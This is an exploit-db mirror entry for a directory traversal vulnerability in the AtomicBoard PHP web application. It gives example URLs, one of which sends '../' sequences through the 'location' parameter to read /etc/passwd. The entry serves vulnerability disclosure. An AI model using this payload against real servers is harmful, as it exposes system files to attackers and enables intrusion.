exploit-db-mirror/exploits/php/webapps/22941.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

7 lines
No EOL
534 B
Text

source: http://www.securityfocus.com/bid/8236/info
It has been reported that attackers may be able to modify the 'location' variable passed to the index.php file to cause the Web server to return arbitrary files. This script is prone to a directory traversal vulnerability, allowing attackers to retrieve any file residing on the filesystem readable by the Web server user.
http://www.example.com/atomicboard/index.php?location=../../../../../../etc/passwd
http://www.example.com/AtomicBoard-0.6.2/index.php?location=anything